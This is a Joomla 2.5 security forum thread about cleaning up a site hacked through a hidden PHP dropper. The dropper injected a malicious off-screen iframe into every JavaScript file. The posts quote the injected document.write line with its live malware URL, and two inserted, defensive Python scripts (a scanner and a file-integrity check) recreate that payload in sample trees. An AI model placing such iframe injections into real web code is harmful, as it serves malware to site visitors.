auto malware iframe in Joomla 2.5

Discussion regarding Joomla! 2.5 security issues.

radat
Joomla! Apprentice
Posts: 8
Joined: Sat Nov 27, 2010 6:12 am
Location: Russia, St. Petersburg

auto malware iframe in Joomla 2.5

Post by radat » Sat Jan 19, 2013 11:18 am

Hi! Two days ago, the following code started being written automatically into all the .js files:

Code:

;document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://zwdqnikmq.wikaba.com/e6fcc0c51bb0bc8b3a.PGgnVmzaJXoj?default" height="110" width="110"></iframe>');
The link in this code always changes to a different link when I reload my site in the browser.

Site http://312school-spb.ru

I installed a clean Joomla (downloaded from this site - http://www.joomla.org/download.html) on a test domain, and this iframe was written into the test Joomla after several refreshes of the site in a browser: http://test.312school-spb.ru

Site http://312school-spb.ru is not working now because the iframe creates a redirect. The test site http://test.312school-spb.ru is working, but you can see that the iframe is also trying to redirect.

The server has been checked with antivirus, but no problems were found.

Please help solve the problem.
Last edited by Per Yngve Berg on Sat Jan 19, 2013 12:00 pm, edited 1 time in total.
Reason: Relocated the topic to the Security Forum.

Webdongle
Joomla! Master
Posts: 44092
Joined: Sat Apr 05, 2008 9:58 pm

Re: auto malware iframe in Joomla 2.5

Post by Webdongle » Sat Jan 19, 2013 11:46 am

Full instructions on how to deal with a hacked site can be found at http://forum.joomla.org/viewtopic.php?f=621&t=582854
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".


Re: auto malware iframe in Joomla 2.5

Post by radat » Mon Jan 21, 2013 8:57 am

Webdongle wrote:Full instructions on how to deal with a hacked site can be found at http://forum.joomla.org/viewtopic.php?f=621&t=582854
Webdongle, thanks for your reply.

Problem solved. Briefly:

The following file was found and deleted: 312school-spb.ru/components/com_content/.csdizx.php

If interested, here is the deleted file in an archive: https://www.box.com/s/mp0pvfery30gnbo9bz

After this file (.csdizx.php) was deleted, I deleted the bad code in all the JavaScript files, and after refreshing the site in the browser the code no longer appears.

Now the site is working properly: http://312school-spb.ru

There remains the question of how this file (.csdizx.php) could get onto the site.

Here is the FPA script info: https://www.box.com/s/uq2whdl7c3af9tvkbxvh
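The post above describes the two artefacts of this infection: a hidden dot-prefixed PHP file dropped inside a core component directory, and a document.write of an off-screen iframe prepended to every .js file (and re-added on the next request while the dropper is still present). The following is an added example, not code from the original post or from Joomla, of the triage pass a responder would run over a Joomla tree to surface both. The sample tree, the placeholder dropper contents and the example.invalid URL are constructed for the demonstration; the pattern keys on the shape of the payload (document.write of a position:fixed iframe) rather than on a domain, because the post notes the link changes on every reload.

```python
"""Triage scan for the two indicators described in this thread:
a hidden dot-prefixed PHP file under a core component directory, and a
document.write('<iframe style="position:fixed;..."') statement injected
into JavaScript files. Added example, not code from the original post."""
import os
import re
import tempfile
from pathlib import Path

# The payload in the thread changes its src on every reload, so match on the
# shape of the injection (off-screen fixed-position iframe written by
# document.write), not on a domain. An optional leading ';' and trailing ';'
# are swallowed so that removal leaves the surrounding script intact.
INJECTED_IFRAME_RE = re.compile(
    r";?\s*document\.write\(\s*(['\"])<iframe[^>]*position\s*:\s*fixed"
    r"[^>]*>\s*</iframe>\1\s*\)\s*;?",
    re.IGNORECASE,
)

PHP_SUFFIXES = (".php", ".phtml", ".php3", ".php5", ".phar")


def find_hidden_php(root: Path) -> list[str]:
    """Dot-prefixed PHP files anywhere under root (e.g. components/com_content/.csdizx.php).
    A clean Joomla install ships no such files, so any hit needs a look."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.startswith(".") and name.lower().endswith(PHP_SUFFIXES):
                hits.append((Path(dirpath) / name).relative_to(root).as_posix())
    return sorted(hits)


def find_injected_js(root: Path) -> list[str]:
    """JavaScript files containing the injected iframe writer."""
    hits = []
    for path in root.rglob("*.js"):
        if not path.is_file():
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        if INJECTED_IFRAME_RE.search(text):
            hits.append(path.relative_to(root).as_posix())
    return sorted(hits)


def strip_injected_js(path: Path) -> int:
    """Remove every injected statement from one .js file; returns the count removed.
    Only worthwhile after the PHP dropper is gone, otherwise the file is
    re-infected on the next request (as the original post observed)."""
    text = path.read_text(encoding="utf-8", errors="replace")
    cleaned, count = INJECTED_IFRAME_RE.subn("", text)
    if count:
        path.write_text(cleaned, encoding="utf-8")
    return count


def build_sample_tree() -> Path:
    """Constructed Joomla-like tree for the demonstration (not a real site)."""
    root = Path(tempfile.mkdtemp(prefix="joomla-triage-"))
    (root / "components" / "com_content").mkdir(parents=True)
    (root / "media" / "system" / "js").mkdir(parents=True)
    # Clean core script: must not be flagged.
    (root / "media" / "system" / "js" / "core.js").write_text(
        "(function(){var j=window.Joomla||{};})();\n", encoding="utf-8")
    # Infected script: payload prepended, with a constructed src domain.
    injected = (';document.write(\'<iframe style="position:fixed;top:0px;left:-550px;" '
                'src="http://example.invalid/abc123.PGgnVmzaJXoj?default" '
                'height="110" width="110"></iframe>\');')
    (root / "media" / "system" / "js" / "mootools.js").write_text(
        injected + "var MooTools={version:'1.4'};\n", encoding="utf-8")
    # Hidden dropper in a core component directory, named as in the thread;
    # the body is a placeholder, not the real file.
    (root / "components" / "com_content" / ".csdizx.php").write_text(
        "<?php /* placeholder standing in for the dropper */\n", encoding="utf-8")
    # A legitimate dotfile that is not PHP: must not be flagged.
    (root / ".htaccess").write_text("RewriteEngine On\n", encoding="utf-8")
    return root


def triage(root: Path) -> dict[str, list[str]]:
    """Both indicator scans over one tree."""
    return {"hidden_php": find_hidden_php(root), "injected_js": find_injected_js(root)}


if __name__ == "__main__":
    site = build_sample_tree()
    for kind, paths in triage(site).items():
        print(kind, paths)
```

Run it against a site's document root instead of the sample tree by passing that path to triage(); a hit in hidden_php is the file to pull for analysis before anything is cleaned, since deleting the .js payload first only gets it rewritten.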


Re: auto malware iframe in Joomla 2.5

Post by Webdongle » Mon Jan 21, 2013 10:13 am

radat wrote:...
Problem solved. ...
Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php
...
Unless you deleted all the folders/files on the server then you have not completely eradicated the hack. Also you have not posted the results of the FPA, which suggests you have not followed the advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 . Your site (even in the unlikely event that you managed to locate all the hack files) will still be vulnerable to attack by hackers.


Re: auto malware iframe in Joomla 2.5

Post by radat » Mon Jan 21, 2013 11:05 am

Webdongle wrote:
radat wrote:...
Problem solved. ...
Was found and deleted the file: 312school-spb.ru/components/com_content/.csdizx.php
...
Also you have not posted the results of the FPA .....
Thanks for the help, Webdongle. Here is...
Problem Description (Forum Post Assistant v1.2.3, 21st January 2013) :: auto malware iframe in Joomla 2.5
Actions Taken To Resolve (Forum Post Assistant v1.2.3, 21st January 2013) :: The server has been checked with antivirus, but no problems were found.

The following file was found and deleted: 312school-spb.ru/components/com_content/.csdizx.php

After this file (.csdizx.php) was deleted, I deleted the bad code in all the JavaScript files.
Forum Post Assistant (v1.2.3) : 21st January 2013 ::
Basic Environment :: Joomla! Instance :: Joomla! 2.5.8-Stable (Ember) 8-November-2012
Joomla! Platform :: Joomla Platform 11.4.0-Stable (Brian Kernighan) 03-Jan-2012
Joomla! Configured :: Yes | Read-Only (444) | Owner: radatus (uid: 1/gid: 1) | Group: radatus (gid: 1) | Valid For: 1.5
Configuration Options :: Offline: 0 | SEF: 1 | SEF Suffix: 1 | SEF ReWrite: 1 | .htaccess/web.config: Yes | GZip: 1 | Cache: 1 | FTP Layer: 0 | SSL: 0 | Error Reporting: default | Site Debug: 0 | Language Debug: 0 | Default Access: N/A | Unicode Slugs: N/A | Database Credentials Present: Yes

Host Configuration :: OS: Linux | OS Version: 2.6.32-5-amd64 | Technology: x86_64 | Web Server: Apache/2.2.16 (Debian) | Encoding: gzip, deflate | Doc Root: /var/www/radatus/data/www/312school-spb.ru | System TMP Writable: Yes

PHP Configuration :: Version: 5.3.3-7+squeeze14 | PHP API: cgi-fcgi | Session Path Writable: Yes | Display Errors: | Error Reporting: 22527 | Log Errors To: | Last Known Error: | Register Globals: | Magic Quotes: | Safe Mode: | Open Base: | Uploads: 1 | Max. Upload Size: 200M | Max. POST Size: 200M | Max. Input Time: 60 | Max. Execution Time: 30 | Memory Limit: 256M

MySQL Configuration :: Version: 5.1.61-0+squeeze1 (Client:5.1.61) | Host: --protected-- (--protected--) | Collation: utf8_general_ci (Character Set: utf8) | Database Size: 9.31 MiB | #of Tables: 167
Detailed Environment :: PHP Extensions :: Core (5.3.3-7+squeeze14) | date (5.3.3-7+squeeze14) | ereg () | libxml () | openssl () | pcre () | zlib (1.1) | bcmath () | bz2 () | calendar () | ctype () | dba () | dom (20031129) | hash (1.0) | fileinfo (1.0.5-dev) | filter (0.11.0) | ftp () | gettext () | session () | iconv () | json (1.2.1) | mbstring () | standard (5.3.3-7+squeeze14) | posix () | Reflection ($Revision: 300393 $) | SPL (0.2) | shmop () | SimpleXML (0.1) | soap () | sockets () | Phar (2.0.1) | exif (1.4 $Id: exif.c 293036 2010-01-03 09:23:27Z sebastian $) | sysvmsg () | sysvsem () | sysvshm () | tokenizer (0.1) | wddx () | xml () | xmlreader (0.1) | xmlwriter (0.1) | zip (1.9.1) | cgi-fcgi () | ADOdb () | curl () | ffmpeg (0.6.0-svn) | gd () | gmp () | idn () | imagick (3.0.0RC1) | imap () | mcrypt () | mysql (1.0) | mysqli (0.1) | PDO (1.0.4dev) | pdo_mysql (1.0.2) | pdo_sqlite (1.0.1) | pspell () | recode () | SQLite (2.0-dev) | sqlite3 (0.7-dev) | suhosin (0.9.32.1) | tidy (2.0) | uuid () | xmlrpc (0.51) | xsl (0.1) | mhash () | ionCube Loader () | Zend Guard Loader () | Zend Engine (2.3.0) |
Potential Missing Extensions ::

Switch User Environment (Experimental) :: PHP CGI: Yes | Server SU: Yes | PHP SU: Yes | Custom SU (LiteSpeed/Cloud/Grid): Yes
Potential Ownership Issues: No
Folder Permissions :: Core Folders :: images/ (755) | components/ (755) | modules/ (755) | plugins/ (755) | language/ (755) | templates/ (755) | cache/ (755) | logs/ (755) | tmp/ (755) | administrator/components/ (755) | administrator/modules/ (755) | administrator/language/ (755) | administrator/templates/ (755) |

Elevated Permissions (First 10) ::
Extensions Discovered :: Components :: SITE :: com_mailto (2.5.0) | Default (1.0.0) | com_wrapper (2.5.0) | Extended Pro Template (2.2.5) | Default (2.2.0) | Default (2.2.0) |
Components :: ADMIN :: com_search (2.5.0) | com_phocagallery (3.2.2) | com_finder (2.5.0) | com_content (2.5.0) | com_admin (2.5.0) | com_joomlaupdate (2.5.0) | com_weblinks (2.5.0) | com_modules (2.5.0) | com_users (2.5.0) | com_easybookreloaded (4.0) | com_languages (2.5.0) | com_messages (2.5.0) | SMFAQ (1.6.0) | com_login (2.5.0) | com_templates (2.5.0) | com_cpanel (2.5.0) | com_redirect (2.5.0) | com_media (2.5.0) | COM_GCALENDAR (2.3.0) | com_cache (2.5.0) | com_newsfeeds (2.5.0) | Widgetkit (1.0.0) | com_categories (2.5.0) | com_checkin (2.5.0) | com_installer (2.5.0) | com_plugins (2.5.0) | JomSocial (2.2.5) | com_menus (2.5.0) | com_config (2.5.0) | com_banners (2.5.0) | com_kunena (1.7.1) | com_kunena (1.7.2) | Kunena language pack (@kunenaversio) | plg_system_kunena (-) | plg_system_kunena (-) | plg_system_kunena (1.7.1) | System - Kunena (1.7.1) | com_xmap (2.0) |

Modules :: SITE :: mod_articles_categories (2.5.0) | mod_finder (2.5.0) | mod_weather_gk4 (GK4 1.6) | mod_articles_archive (2.5.0) | Image Show GK4 (GK4 1.13) | Расширенный мод� (1.1) | mod_weblinks (2.5.0) | mod_articles_popular (2.5.0) | Magic Simple Video Player (1.0.2) | Widgetkit (1.0.0) | MOD_GCALENDAR (2.3.0) | MOD_JLVKGROUP (2.3) | mod_custom (2.5.0) | mod_articles_news (2.5.0) | mod_whosonline (2.5.0) | mod_feed (2.5.0) | mod_random_image (2.5.0) | MOD_GCALENDAR_NEXT (2.3.0) | mod_breadcrumbs (2.5.0) | Widgetkit Twitter (1.0.0) | mod_stats (2.5.0) | mod_syndicate (2.5.0) | mod_wrapper (2.5.0) | mod_news_pro_gk4 (GK4 2.3) | mod_articles_category (2.5.0) | mod_menu (2.5.0) | mod_footer (2.5.0) | JA Facebook Like Box Module (2.5.2) | Hello Me (2.2.4) | MOD_GCALENDAR_UPCOMING (2.3.0) | mod_search (2.5.0) | JA Twitter Module (2.5.2) | mod_users_latest (2.5.0) | mod_articles_latest (2.5.0) | mod_languages (2.5.0) | mod_banners (2.5.0) | Kunena Latest (1.7.0) | mod_related_items (2.5.0) | mod_login (2.5.0) |
Modules :: ADMIN :: mod_status (2.5.0) | mod_custom (2.5.0) | mod_toolbar (2.5.0) | mod_version (2.5.0) | mod_feed (2.5.0) | mod_unread (1.6.0) | mod_popular (2.5.0) | mod_title (2.5.0) | mod_logged (2.5.0) | mod_latest (2.5.0) | mod_submenu (2.5.0) | mod_menu (2.5.0) | mod_online (1.6.0) | mod_quickicon (2.5.0) | mod_multilangstatus (2.5.0) | mod_login (2.5.0) |

Plugins :: SITE :: plg_extension_joomla (2.5.0) | plg_quickicon_extensionupdate (2.5.0) | plg_quickicon_joomlaupdate (2.5.0) | plg_user_joomla (2.5.0) | plg_user_contactcreator (2.5.0) | User - Jomsocial User (1.8.1) | plg_user_profile (2.5.0) | plg_captcha_recaptcha (2.5.0) | plg_content_pagenavigation (2.5.0) | plg_content_joomla (2.5.0) | plg_content_pagebreak (2.5.0) | plg_content_geshi (2.5.0) | plg_content_loadmodule (2.5.0) | plg_content_vote (2.5.0) | plg_content_finder (2.5.0) | Content - Widgetkit (1.0.0) | plg_content_emailcloak (2.5.0) | plg_editors_codemirror (1.0) | plg_editors_tinymce (3.5.4.1) | PLG_EDITORS-XTD_MODULESANYWHER (1.12.0) | plg_editors-xtd_pagebreak (2.5.0) | plg_editors-xtd_article (2.5.0) | plg_editors-xtd_readmore (2.5.0) | plg_editors-xtd_image (2.5.0) | plg_finder_contacts (2.5.0) | plg_finder_weblinks (2.5.0) | plg_finder_newsfeeds (2.5.0) | plg_finder_content (2.5.0) | plg_finder_categories (2.5.0) | My Kunena Forum Posts (1.7.0) | Стена сообщений (2.0.0) | My Kunena Forum Menu (1.7.0) | plg_search_gcalendar (2.3.0) | plg_search_contacts (2.5.0) | plg_search_weblinks (2.5.0) | plg_search_newsfeeds (2.5.0) | plg_search_content (2.5.0) | plg_search_categories (2.5.0) | plg_authentication_joomla (2.5.0) | plg_authentication_gmail (2.5.0) | plg_authentication_ldap (2.5.0) | plg_system_redirect (2.5.0) | plg_system_jch_optimize (2.0.2) | System - Widgetkit Joomla (1.0.0) | PLG_SYSTEM_MODULESANYWHERE (1.12.0) | plg_system_languagecode (2.5.0) | plg_system_logout (2.5.0) | System - Widgetkit (1.0.0) | plg_system_p3p (2.5.0) | plg_system_sef (2.5.0) | PLG_SYSTEM_NNFRAMEWORK (11.9.1) | System - Jomsocial Facebook Co (1.0) | Jomsocial Update (1.5) | plg_system_remember (2.5.0) | plg_system_banip (2.5.4) | backendtoken (1.2) | Google Maps (2.131c) | plg_system_debug (2.5.0) | plg_system_cache (2.5.0) | Azrul System Mambot For Joomla (3.3) | plg_system_log (2.5.0) | System - Zend Lib (1.11.4) | plg_system_languagefilter (2.5.0) | 
plg_system_kunena (1.7.1) | plg_system_highlight (2.5.0) | System - KeyCAPTCHA (4.1.3) |
Templates Discovered :: Templates :: SITE :: beez_20 (2.5.0) | yoo_nano2 (1.0.1) | beez5 (2.5.0) | atomic (2.5.0) |
Templates :: ADMIN :: hathor (2.5.0) | bluestork (2.5.0) |


Re: auto malware iframe in Joomla 2.5

Post by Webdongle » Mon Jan 21, 2013 11:26 am

Have you done everything else on the list?
Delete all files
Check computers for malware
Change passwords
Check if extensions are on the Vulnerable Extensions List
Check all extensions are up to date


What is the 'Стена сообщений' plugin ?
Where did you download it from ?

Where did you download your custom Template from ?


The hack found a hole in your security somewhere ... you need to delete all your files to make sure you have deleted all the hack files. And you need to do everything else on http://forum.joomla.org/viewtopic.php?f=621&t=582854 to make sure you close that hole (and any others that you may have).

Once you have eradicated the hack files by deleting all files and closed the security hole(s) ... only then have you fixed the site.

If you close the hole(s) without deleting all files then the hack will open up more holes. It is important that you do everything on http://forum.joomla.org/viewtopic.php?f=621&t=582854 in the order the instructions say.


Re: auto malware iframe in Joomla 2.5

Post by radat » Mon Jan 21, 2013 12:06 pm

Webdongle wrote:Have you done everything else on the list....
Delete all files - what files must I delete? All site files?

check computers for malware - yes. Checked with NOD32 5.2.9.12, OK!

change passwords - yes. Changed the server root password, the MySQL root password, the FTP password, and the MySQL user and password for school312-spb.ru

check if extensions are on the Vulnerable Extensions List
- yes.

check all extensions are up to date - not all. Kunena 1.7.1 and JomSocial 2.2.5

What is the 'Стена сообщений' plugin? - this is the JomSocial community walls plugin. I downloaded it from the official site in my account here: http://www.jomsocial.com/component/account/ and translated it.

Where did you download your custom Template from? - I downloaded it from my account at YOOtheme here: http://www.yootheme.com/account/account


Re: auto malware iframe in Joomla 2.5

Post by Webdongle » Mon Jan 21, 2013 1:33 pm

radat wrote:...
Delete all files - what files i must delete ? All site files ?
...
Yes, all site files, because ... unless you are an expert and know how to use a scanner ... you cannot be certain you have found all the hack files or whether genuine files have been compromised.


radat wrote:...
change passwords - yes. Change root pass server, root pass MySQL, pass ftp, pass and user MySQL school312-spb.ru
...
If you changed the passwords before deleting all the files then there could be a hacked file still on the server that steals your new passwords (or allows hackers access so as to find your new passwords).


radat wrote:...

check if extensions are on the Vulnerable Extensions List
- yes.

check all extensions are up to date - not all. Kunena 1.7.1 and JomSocial 2.2.5
...
Then you saw http://docs.joomla.org/Vulnerable_Exten ... ist#Kunena saying old versions of Kunena are vulnerable.
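Webdongle's point that a non-expert "cannot be certain you have found all the hack files or whether genuine files have been compromised" is exactly the question a file-integrity comparison against a known-clean copy answers, and it is the check to run before deciding between cleaning and rebuilding. The following is an added example, not code from this thread or from Joomla: it hashes every file in the live site and in a clean, freshly downloaded copy of the same release (the FPA above shows 2.5.8), then reports shipped files whose contents differ, files that exist only on the live site, and PHP files sitting in directories that should hold only static assets. Both directory trees, the placeholder file bodies and the example.invalid URL are constructed stand-ins. On a real site the only_in_live list will also contain legitimate third-party extensions and uploads, which have to be compared against their own clean packages or reviewed by hand.

```python
"""Integrity comparison of a live Joomla tree against a clean copy of the
same release. Added example, not code from the original thread or from Joomla.
Sample trees are constructed in a temporary directory."""
import hashlib
import tempfile
from pathlib import Path

# Paths a clean package does not ship, or that legitimately differ per site.
DEFAULT_IGNORE = ("configuration.php", "cache/", "logs/", "tmp/")
# Directories that hold uploads and static assets; PHP here is a red flag.
NO_PHP_DIRS = ("images", "media", "cache", "tmp", "logs")
PHP_SUFFIXES = (".php", ".phtml", ".php3", ".php5", ".phar")


def sha256_file(path: Path) -> str:
    """SHA-256 of a file's contents, read in chunks so large media files are fine."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root: Path) -> dict[str, str]:
    """Map of POSIX-style relative path -> sha256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in root.rglob("*") if p.is_file()}


def _ignored(rel: str, ignore: tuple[str, ...]) -> bool:
    return any(rel == pat or (pat.endswith("/") and rel.startswith(pat)) for pat in ignore)


def compare_trees(live: Path, clean: Path, ignore=DEFAULT_IGNORE) -> dict[str, list[str]]:
    """Classify every file: modified (hash differs from the clean copy),
    only_in_live (not shipped in the clean package: backdoors, but also
    extensions and uploads), missing (shipped but absent on the live site)."""
    live_h, clean_h = hash_tree(live), hash_tree(clean)
    modified = sorted(r for r in live_h
                      if r in clean_h and live_h[r] != clean_h[r] and not _ignored(r, ignore))
    only_live = sorted(r for r in live_h if r not in clean_h and not _ignored(r, ignore))
    missing = sorted(r for r in clean_h if r not in live_h and not _ignored(r, ignore))
    return {"modified": modified, "only_in_live": only_live, "missing": missing}


def php_in_asset_dirs(live: Path, dirs=NO_PHP_DIRS) -> list[str]:
    """PHP files under upload/asset directories, where no executable code belongs."""
    hits = []
    for d in dirs:
        base = live / d
        if not base.is_dir():
            continue
        for p in base.rglob("*"):
            if p.is_file() and p.suffix.lower() in PHP_SUFFIXES:
                hits.append(p.relative_to(live).as_posix())
    return sorted(hits)


def build_sample_trees() -> tuple[Path, Path]:
    """Constructed clean and live trees standing in for a Joomla 2.5.8 package and a site."""
    base = Path(tempfile.mkdtemp(prefix="joomla-integrity-"))
    clean, live = base / "clean", base / "live"
    core = {
        "index.php": "<?php define('_JEXEC', 1); require 'includes/framework.php';\n",
        "components/com_content/controller.php": "<?php class ContentController {}\n",
        "media/system/js/core.js": "var Joomla = Joomla || {};\n",
    }
    for root in (clean, live):
        for rel, body in core.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body, encoding="utf-8")
    # Live-site deviations: per-site config (expected), injected core JS,
    # hidden dropper in a core directory, and a PHP file among the uploads.
    (live / "configuration.php").write_text("<?php class JConfig {}\n", encoding="utf-8")
    (live / "media/system/js/core.js").write_text(
        ";document.write('<iframe style=\"position:fixed;top:0px;left:-550px;\" "
        "src=\"http://example.invalid/x\"></iframe>');var Joomla = Joomla || {};\n",
        encoding="utf-8")
    (live / "components/com_content/.csdizx.php").write_text(
        "<?php /* dropper stand-in */\n", encoding="utf-8")
    (live / "images").mkdir()
    (live / "images/banner.php").write_text("<?php /* webshell stand-in */\n", encoding="utf-8")
    return live, clean


if __name__ == "__main__":
    live_site, clean_pkg = build_sample_trees()
    for kind, paths in compare_trees(live_site, clean_pkg).items():
        print(kind, paths)
    print("php_in_asset_dirs", php_in_asset_dirs(live_site))
```

The clean copy must be the same release as the live site (compare against the version the FPA reports, not the latest download), otherwise every file touched by an update shows up as modified. Anything in the modified list is a shipped file that was altered and should simply be replaced from the clean package; the decision Webdongle describes, replace every file rather than hunt for the bad ones, is what this report argues for whenever only_in_live is too long to review.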


Re: auto malware iframe in Joomla 2.5

Post by radat » Mon Jan 21, 2013 2:21 pm

Webdongle wrote:Yes all site files because ...
If I delete all the files of the site then the site will not work! :) In essence you are proposing to rebuild the site. Unfortunately this is not possible in the near future.
Webdongle wrote:If you changed the passwords before deleting all the files
Malware on the site cannot just pick up root passwords. But about the database password of the site you're right; it should be changed after the removal of all files and the rebuild of the site.
Webdongle wrote: ...saying old versions of Kunena are vulnerable.
So what to do. It must be upgraded... :)

Webdongle thank you for your support. Now I need to work harder on the site. :pop :)

Thank you. Have a nice day!

Regards, Anton.


Re: auto malware iframe in Joomla 2.5

Post by Webdongle » Mon Jan 21, 2013 2:41 pm

radat wrote:...
If I delete all the files of the site then the site will not work! :) ...
If you read the instructions on http://forum.joomla.org/viewtopic.php?f=621&t=582854 it will tell you how to replace the files with fresh ones.

radat wrote:...
Malware in site can not just pick up root passwords. But the database password of the site you're right, i should be changed after the removal of all files and rebuild the site.....
Sorry but you are wrong ... hacked files on your site can allow the hacker full access to your server. The hacker can add/change/move any folder/file on your server that you can using FTP. And that allows the hacker not only to read the configuration.php file and thus have full access to your database ... it allows the hacker to put files on your server.

If you still have infected files on your site the hacker can place files on your site that infect visiting browsers and thus the PCs that the browsers are on. And the hacker can put files on your site that can allow access to server settings.



radat wrote:...
So what to do. Must be upgraded... :)
...
Please refer to http://forum.joomla.org/viewtopic.php?f=621&t=582854


radat wrote:... thank you for your support. Now I need to work harder on the site. :pop :)....
The advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 was compiled by many people and each step has a reason. Fail to complete each step and you risk working even harder to do it all over again. And you risk having your database and server compromised. Not to mention having your site blacklisted by Google and other search engines.


Re: auto malware iframe in Joomla 2.5

Post by radat » Mon Jan 21, 2013 3:34 pm

Webdongle wrote:The advice on http://forum.joomla.org/viewtopic.php?f=621&t=582854 was compiled by many people and each step has a reason. Fail to complete each step and you risk working even harder to do it all over again. And you risk having your database and server compromised. Not to mention having your site blacklisted by Google and other search engines.
I understand. Thanks for the help! Good luck!

